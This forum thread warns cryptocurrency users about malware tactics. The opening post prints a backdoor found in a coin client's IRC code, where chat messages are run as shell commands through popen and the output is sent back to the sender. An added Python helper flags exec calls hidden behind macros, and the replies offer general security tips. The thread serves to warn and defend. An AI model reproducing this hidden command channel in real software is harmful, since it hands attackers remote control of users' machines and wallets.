Miha Kot
Newbie
Offline
Activity: 56
Merit: 0
|
|
June 30, 2018, 11:50:41 AM |
|
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.

Here is the relevant source code:

Code:
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

Here is the source code with macros resolved:

Code:
    // Branch is taken for an IRC PRIVMSG whose fourth word is ":!"
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // The text starting at vWords[4] is handed to popen(), i.e. run as a command
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf)
        {
            // Collect the command's output
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            // Take the sender's nick from the message prefix (text before '!')
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // Send the collected output back to that nick as a PRIVMSG
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

What security system should one use to avoid falling into the trap of cybercriminals, and how can one tell that it is cybercriminals?
|
|
|
|
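An added example (not from the post above or from the coin's source): a small Python audit helper that resolves object-like `#define` aliases in C/C++ source and reports process-execution calls hidden behind them, which is how `CRead` concealed `popen` in the backdoor described above. The `#define` lines in the sample are constructed to match the macro resolution shown in the post; the function names and the sink list are assumptions of this example, and function-like macros are not handled.

```python
import re

# Calls that start a process or shell; finding one behind an alias deserves review.
EXEC_SINKS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
              "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}
DEFINE_RE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(.+?)\s*$')
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')

# Constructed sample: the #define lines are assumed, the call site follows the post.
SAMPLE = r'''
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) { CFree(buf); }
}
'''

def collect_macros(source):
    """Map object-like macro names to their replacement text."""
    hits = (DEFINE_RE.match(line) for line in source.splitlines())
    return {m.group(1): m.group(2) for m in hits if m}

def resolve(name, macros, depth=8):
    """Follow alias chains (A -> B -> popen) up to a fixed depth."""
    while depth and name in macros:
        name, depth = macros[name].strip(), depth - 1
    return name

def find_hidden_sinks(source):
    """Return (line_no, alias, sink) for each exec sink reached through a macro."""
    macros = collect_macros(source)
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(line):
            continue
        code = STRING_RE.sub('""', line)  # ignore identifiers inside string literals
        for ident in IDENT_RE.findall(code):
            target = resolve(ident, macros)
            if target in EXEC_SINKS and ident != target:
                findings.append((no, ident, target))
    return findings

if __name__ == "__main__":
    print(find_hidden_sinks(SAMPLE))
```

Direct calls to a sink are deliberately not reported here, since a plain text search already finds them; the helper targets the aliasing that defeats such a search.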
diego ramos
Newbie
Offline
Activity: 113
Merit: 0
|
|
June 30, 2018, 05:32:07 PM |
|
Tell me, is it so that Mac OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected.
|
|
|
|
dablatair
Member
Offline
Activity: 324
Merit: 15
|
|
July 04, 2018, 08:46:06 AM |
|
I'm quite impressed by the power and imagination of hackers to find the weakness and exploit it everywhere!
Finally, you never know if you are 100% safe or not.
Just be as careful as possible.
|
|
|
|
iSparta
Member
Offline
Activity: 728
Merit: 10
|
|
July 05, 2018, 07:05:33 PM |
|
A year ago, my email was hacked. After that, the coins were withdrawn from the exchange. It cost about 3,5k$. 2FA had not been installed. Gmail mail return failed. Many contacts are missing.
It is better to have a special e-mail for the exchange with 2FA enabled and a special smartphone with the Google application. You don't have to use this e-mail and smartphone for any other purposes.
|
|
|
|
cryptohorizons
Newbie
Offline
Activity: 2
Merit: 0
|
|
July 06, 2018, 06:22:49 AM |
|
I've seen some ads on FB and Google that take you to a page that installs mining scripts too...
|
|
|
|
Ethan101
Newbie
Offline
Activity: 98
Merit: 0
|
|
July 06, 2018, 07:20:52 AM |
|
Nowadays a lot of phishing and malware-infected hacking attempts are happening due to bad guys who want to steal your personal information, especially private keys. Blockchain technology is a good technology but it still has a lot of problems that need to be addressed. I want every cryptocurrency wallet to have a double factor authentication key that works with Google Authenticator.
|
|
|
|
Proba001
Newbie
Offline
Activity: 6
Merit: 0
|
|
July 06, 2018, 08:16:47 AM |
|
Double authentication is the best thing you can think of!!! I agree 100%.
|
|
|
|
fsn
Member
Offline
Activity: 224
Merit: 10
|
|
July 06, 2018, 10:19:42 AM |
|
Always beware of increasingly sophisticated malware infection attempts and just believe.
|
|
|
|
edsnowangel
Member
Offline
Activity: 280
Merit: 39
Citowise-Developing Crypotpayment Infrastructure
|
|
July 08, 2018, 02:07:15 PM |
|
Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but isn't Kaspersky enough? If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
Yes, most malware are executable files for the Windows operating system, but this doesn't mean that malware can't affect other operating systems such as Mac and Linux distros. There are other malware and viruses that can also penetrate other operating systems. The key is to make sure that we do not easily fall into the trap of these people who are taking advantage of newbies.
|
sd
|
|
|
Birenda23
Newbie
Offline
Activity: 11
Merit: 0
|
|
July 08, 2018, 04:55:01 PM |
|
I hope to have a healthy community and warn the coin to show signs of scam
|
|
|
|
meerkatoken
Copper Member
Jr. Member
Offline
Activity: 42
Merit: 2
|
|
July 08, 2018, 05:52:53 PM |
|
Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but isn't Kaspersky enough? If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
Yes, most malware are executable files for the Windows operating system, but this doesn't mean that malware can't affect other operating systems such as Mac and Linux distros. There are other malware and viruses that can also penetrate other operating systems. The key is to make sure that we do not easily fall into the trap of these people who are taking advantage of newbies. I believe the best you can do is to install the latest Malwarebytes. It is available for Win, Mac and Linux as well.
|
|
|
|
coincentrado
Jr. Member
Offline
Activity: 36
Merit: 1
|
|
July 08, 2018, 08:42:06 PM |
|
Thanks for the warning!
|
Follow me on Steemit.com/@coincentrado
|
|
|
userclix
Newbie
Offline
Activity: 25
Merit: 0
|
|
July 09, 2018, 06:14:31 AM |
|
Thank you for identifying these issues and providing useful tips and solutions to avoid being scammed. The crypto currency sphere needs this type of vigilance to attract more users in the future. It is really helpful. Much appreciated!
|
|
|
|
cryptohelp2
Newbie
Offline
Activity: 11
Merit: 0
|
|
July 09, 2018, 06:46:34 AM |
|
It's extremely important to be updated about security vulnerabilities these days.
|
|
|
|
Phuc1411
Newbie
Offline
Activity: 126
Merit: 0
|
|
July 09, 2018, 12:58:48 PM |
|
Thanks, this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money. This is very helpful. I am very carefree while on the net, but with this information I will be more cautious.
|
|
|
|
DeathCrash
Member
Offline
Activity: 182
Merit: 12
|
|
July 09, 2018, 06:37:09 PM |
|
The software of hackers is improved every hour, with this you cannot argue, so as not to become a victim of a hacker, observe simple rules. 1. Update the antivirus in time 2. Enable auto-update of the system and all important programs (Browsers, Java script, etc.) 3. Buy a good router 4. Or as an option, use Linux for wallets
|
|
|
|
edsnowangel
Member
Offline
Activity: 280
Merit: 39
Citowise-Developing Crypotpayment Infrastructure
|
|
July 10, 2018, 12:45:23 AM |
|
The software of hackers is improved every hour, with this you cannot argue, so as not to become a victim of a hacker, observe simple rules. 1. Update the antivirus in time 2. Enable auto-update of the system and all important programs (Browsers, Java script, etc.) 3. Buy a good router 4. Or as an option, use Linux for wallets
Great suggestion. Linux wallet and Linux OS is great, but there are other attacks like spoofing to inject malware into the user's machine. To avoid getting hacked, I will add: make sure you are connected to secure DNS servers; this will also add a little security to your machine.
|
sd
|
|
|
Pomualdo
Newbie
Offline
Activity: 91
Merit: 0
|
|
July 10, 2018, 04:25:44 PM |
|
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.
|
|
|
|
NeelMariaWarner
Jr. Member
Offline
Activity: 350
Merit: 3
Change Your Worlds Build a New Era!
|
|
July 13, 2018, 03:14:48 PM |
|
The software of hackers is improved every hour, with this you cannot argue, so as not to become a victim of a hacker, observe simple rules. 1. Update the antivirus in time 2. Enable auto-update of the system and all important programs (Browsers, Java script, etc.) 3. Buy a good router 4. Or as an option, use Linux for wallets
Good advice sir, really useful for me myself because my computer was hacked a long time ago. So for now I can anticipate for the safety of my laptop. Thanks sir.
|
|
|
|
Pojumek
Newbie
Offline
Activity: 42
Merit: 0
|
|
July 13, 2018, 03:29:40 PM |
|
Remedy me if I'm wrong, yet malware is generally for executables in Windows, no? I mean the wallets are, nevertheless isn't Kaspersky enough?
If not, for what reason do we have to shield from the instance of retrieving passwords from the clients and other stuff from even pen drives with wallets (counting the regular coins ones) like doge ltc btc and a couple of something beyond.
|
|
|
|
|